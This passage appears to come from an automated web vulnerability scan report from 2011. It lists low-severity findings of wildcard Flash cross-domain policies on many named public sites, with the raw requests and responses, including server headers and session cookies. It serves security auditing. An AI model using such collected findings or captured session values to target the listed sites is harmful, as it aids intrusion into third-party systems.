   <allow-access-from domain="*.staging.richrelevance.com"/>
   <allow-access-from domain="*.ecircular-staging.richrelevance.com"/>
   <allow-access-from domain="*.ecircular-staging2.richrelevance.com"/>
   <allow-access-from domain="*.demo.richrelevance.com"/>
   <allow-access-from domain="*.integration.richrelevance.com"/>
   <allow-access-from domain="*.rp.richrelevance.com"/>
   <allow-access-from domain="*.shc.richrelevance.com"/>
   <allow-access-from domain="*.shc-staging.richrelevance.com"/>
   <allow-access-from domain="*.shc-qa.richrelevance.com"/>
   <allow-access-from domain="*.allurent.net" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fuelindustries.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cmycasa.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fluid.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cerosmedia.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.cerosdevelopment.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.lightmakerorlando.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.cerosstaging.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sears.fluid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.craftsman.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.allurent.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.productiveedge.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.zemoga.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kenmore.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.kmart.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.searstestsite.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultclients.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultmarketing.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.colossal-squid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.digitalfolio.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.sears.realartusa.com" to-ports="*" secure="true" />
...[SNIP]...
7.313. http://www.kodakgallery.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kodakgallery.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kodakgallery.com

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=25A692A689E0AB11E4BA608EE3F0B25C.ecom604_main; Domain=kodakgallery.com; Path=/
Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 02-May-2011 13:33:57 GMT; Path=/
Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: DYN_EMAIL=anon_mem1162409204@kodakgallery.com; Domain=kodakgallery.com; Path=/
Set-Cookie: ft_80002=editACopyTest; Domain=kodakgallery.com; Expires=Sun, 01-Apr-2012 13:33:57 GMT; Path=/
Set-Cookie: abTest=ft_80002-; Domain=kodakgallery.com; Expires=Sun, 01-Apr-2012 13:33:57 GMT; Path=/
ETag: W/"707-1301619341000"
Last-Modified: Fri, 01 Apr 2011 00:55:41 GMT
Content-Type: text/xml
Content-Length: 707
Date: Sat, 02 Apr 2011 13:33:57 GMT
Connection: close
Server: ecom604

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
...[SNIP]...
<allow-access-from domain="*.ofoto.com"/>
...[SNIP]...
<allow-access-from domain="*.kodak.com"/>
...[SNIP]...
<allow-access-from domain="*.kodakgallery.com"/>
...[SNIP]...
<allow-access-from domain="*.hippiepix.com"/>
...[SNIP]...
7.314. http://www.kraftrecipes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kraftrecipes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kraftrecipes.com

Response

HTTP/1.0 200 OK
Content-Length: 758
Content-Type: text/xml
Content-Location: http://www.kraftrecipes.com/crossdomain.xml
Last-Modified: Mon, 07 Mar 2011 20:34:46 GMT
Accept-Ranges: bytes
ETag: "b3afc3187ddcb1:5897"
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6510
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:23:47 GMT
Connection: close
Set-Cookie: BIGipServerwww.kraftrecipes.com_80=1251894538.20480.0000; path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.kraftfoods.com" />
<allow-access-from domain="*.greypoupon.com" />
<allow-access-from domain="*.atasteofgreypoupon.com" />
<allow-access-from domain="*.clientstaging.net" />
<allow-access-from domain="*.gigyahosting1.com" />
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="*.doubleclick.com" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.akqa.com" />
<allow-access-from domain="*.comidakraft.com" />
<allow-access-from domain="*.akufen.ca"/>
...[SNIP]...
7.315. http://www.krillion.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.krillion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.krillion.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:59:23 GMT
ETag: "a04a-60-49201c515b780"
Last-Modified: Thu, 07 Oct 2010 07:23:26 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Content-Length: 96
Connection: Close

<cross-domain-policy>
<allow-access-from domain="*.krillion.com" />
</cross-domain-policy>

7.316. http://www.last.fm/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.last.fm
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.last.fm

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 12:14:03 GMT
Server: Apache/1.3.39 (Unix)
X-Proxy-Fix-Up: headers fixed up
Last-Modified: Wed, 10 Dec 2008 15:09:07 GMT
ETag: "32ab-148-493fdb93"
Accept-Ranges: bytes
Content-Length: 328
Content-Type: application/xml
Age: 4738
X-Cache: HIT from cache4.bra.last.fm
X-Cache-Lookup: HIT from cache4.bra.last.fm:8081
Via: 1.0 cache4.bra.last.fm:8081 (squid/2.7.STABLE7)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.last.fm" secure="false" />
...[SNIP]...
<allow-access-from domain="*.audioscrobbler.com"/>
<allow-access-from domain="87.117.229.54" />
...[SNIP]...
7.317. http://www.latimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.latimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.latimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 438
Content-Type: text/xml
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Thu, 03 Mar 2011 02:18:58 GMT
ETag: "1b6-4d6efa92"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:23:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.wp.com"/>
<allow-access-from domain="s-ssl.wordpress.com"/>
<allow-access-from domain="latimesphoto.wordpress.com"/>
<allow-access-from domain="framework.latimes.com"/>
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
7.318. http://www.legacy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.legacy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.legacy.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Last-Modified: Thu, 20 Sep 2007 15:10:00 GMT
Accept-Ranges: bytes
ETag: "054d5098fbc71:0"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:43:20 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.legacy.com" /></cross-domain-
...[SNIP]...
7.319. http://www.lego.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lego.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lego.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 429
Content-Type: text/xml
Last-Modified: Tue, 28 Sep 2010 12:54:18 GMT
Accept-Ranges: bytes
ETag: "92a75b43c5fcb1:0"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 13:34:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.lego.com" />
<allow-access-from domain="pserver.mii.instacontent.net" />
<allow-access-from domain="a248.e.akamai.net"/>
<allow-access-from domain="a248.e.akamai-staging.net"/>
...[SNIP]...
7.320. http://www.livecams.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livecams.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livecams.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 19:12:09 GMT
Accept-Ranges: bytes
Content-Length: 218
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.naiadsystems.com" />
</cros
...[SNIP]...
7.321. http://www.livenation.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livenation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livenation.com

Response

HTTP/1.0 200 OK
Server: Apache
X-DC-Name: 1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "4c3-b383d900"
Accept-Ranges: bytes
Content-Length: 1219
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:56:47 GMT
Connection: close
Set-Cookie: SID=-QmTwYpmUo1j2xXa5mSLvoRATZnHJLv52ppaNOelYqaIIBOBGVV2weR19NXDogn2n-8hQ0Ok6NBT3vG5; path=/; domain=www.livenation.com
Set-Cookie: BID=UF2kDjV9k92gQ_eoCjLzZb0cdURDdVoK1Iet64RSLNGmP26Xl7C9TphQHAuk4XGQLZpXO7lj6VQjW-Z4eKW6; path=/; domain=www.livenation.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=IUzxsu9HiFZ/VhQS5I1hB/I1HF5jYp2R; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ticketmaster.co.nz" />
<allow-access-from domain="*.ticketmaster.co.uk" />
<allow-access-from domain="*.ticketmaster.com" />
<allow-access-from domain="*.ticketmaster.com.au" />
<allow-access-from domain="*.ticketmaster.com.mx" />
<allow-access-from domain="*.ticketmaster.de" />
<allow-access-from domain="*.ticketmaster.ie" />
<allow-access-from domain="*.ticketmaster.es" />
<allow-access-from domain="*.ticketmaster.eu" />
<allow-access-from domain="*.ticketmaster.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmcs" secure="false" />
...[SNIP]...
<allow-access-from domain="ticketmaster.co.nz" />
<allow-access-from domain="ticketmaster.co.uk" />
<allow-access-from domain="ticketmaster.com" />
<allow-access-from domain="ticketmaster.com.au" />
<allow-access-from domain="ticketmaster.com.mx" />
<allow-access-from domain="ticketmaster.de" />
<allow-access-from domain="ticketmaster.ie" />
<allow-access-from domain="ticketmaster.es" />
<allow-access-from domain="ticketmaster.eu" />
...[SNIP]...
7.322. http://www.llbean.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.llbean.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.llbean.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 25 Mar 2011 01:41:07 GMT
ETag: "14e9aa7-d8-b00bd2c0"
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:34:27 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELa TRo IND PHY ONL UNI PUR FIN COM NAV DEM STA", policyref="/w3c/p3p.xml"
Content-Type: text/xml
Content-Length: 216
Date: Sat, 02 Apr 2011 13:34:27 GMT
Connection: close
Set-Cookie: TS6e35ec=1ebe56f9a77f69040a6686a9e25a88e360f4929acee22d194d9725e3; Path=/

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.llbean.com" />
</cross-
...[SNIP]...
7.323. http://www.macys.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.macys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.macys.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 28 Feb 2011 22:47:10 GMT
ETag: "9f2da-23c-75c2d780"
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:26:32 GMT
Content-Length: 572
Connection: close
Set-Cookie: stop_mobi=yes; expires=Sat, 02-Apr-2011 13:56:32 GMT; path=/; domain=.macys.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.serving-sys.com" secure="false"/>
...[SNIP]...
7.324. http://www.mail.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mail.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mail.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:28 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 16:06:10 GMT
Accept-Ranges: bytes
Content-Length: 140
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*.mail.com"/>
<allow-access-from domain="*.mailcdn.com"/>
</cross-domain-policy>
7.325. http://www.marykay.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marykay.com

Response

HTTP/1.1 200 OK
Content-Length: 142
Content-Type: text/xml
Last-Modified: Thu, 10 Mar 2011 18:13:17 GMT
Accept-Ranges: bytes
ETag: "62ae35d44edfcb1:a50fa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9E10431F4176002D0D041EAB2F4F7ACA; Path=/; Domain=.marykay.com
Set-Cookie: TLTSID=9E10431F4176002D0D041EAB2F4F7ACA; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Sat, 02 Apr 2011 14:18:37 GMT
Connection: close
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Sat, 09-Apr-2011 14:18:37 GMT; path=/

<cross-domain-policy>
<allow-access-from domain="*.ai-media.com" />
<allow-access-from domain="*.marykay.com" />
</cross-domain-policy>
7.326. http://www.mastercard.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mastercard.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mastercard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:27 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 20:37:56 GMT
ETag: "50b-4e101100"
Accept-Ranges: bytes
Content-Length: 1291
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_xxx.nbtufsdbse.dpn-iuuq=ffffffff099ee93145525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:30:05 GMT;path=/;httponly

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-
...[SNIP]...
<allow-access-from domain="*.mastercard.us" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercard.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercardbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.priceless.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercard.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercard.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.chasepayeedirectory.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.chasebillmanager.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.loyaltygateway.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercardeasysavings.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercardbusinesssavings.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mastercardacquirernews.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ridenynj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ridenewyorknewjersey.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mastercard.co.uk" secure="false"/>
...[SNIP]...
7.327. http://www.match.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.match.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.match.com

Response

HTTP/1.1 200 OK
Content-Length: 529
Content-Type: text/xml
Content-Location: http://www.match.com/crossdomain.xml
Last-Modified: Tue, 28 Dec 2010 22:07:35 GMT
Accept-Ranges: bytes
ETag: "7f249a2dba6cb1:539"
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:38:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.match.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.match.corp" secure="true" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.bing.com" secure="true" />
...[SNIP]...
7.328. http://www.mcafee.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mcafee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mcafee.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 01 Feb 2011 12:17:33 GMT
Accept-Ranges: bytes
ETag: "80ecda0ac2cb1:0"
Server: Microsoft-IIS/7.0
SN: SJV1
Date: Sat, 02 Apr 2011 13:43:27 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Served by WebAcceleration
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
...[SNIP]...
<allow-access-from domain="*.mcafee.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.google-analytics.com" secure="true" />
...[SNIP]...
7.329. http://www.medcohealth.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.medcohealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.medcohealth.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:13 GMT
Last-Modified: Fri, 29 May 2009 19:11:09 GMT
Accept-Ranges: bytes
Content-Length: 288
Connection: close
Content-Type: application/xml
Set-Cookie: TS2d8041=c0f19c17adfe8a426b998fe9ee67e6ba57bf5195c4d0b4fb4d972afd; Path=/

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...
7.330. http://www.medscape.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.medscape.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.medscape.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:15 GMT
Server: Apache
Last-Modified: Thu, 15 Oct 2009 13:24:15 GMT
ETag: "159eee-1ae-475f9321e5dc0"
Accept-Ranges: bytes
Content-Length: 430
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_xxx-xfc.qsg.qiy1:80=e2413a273660;expires=Sat, 02-Apr-11 15:14:15 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
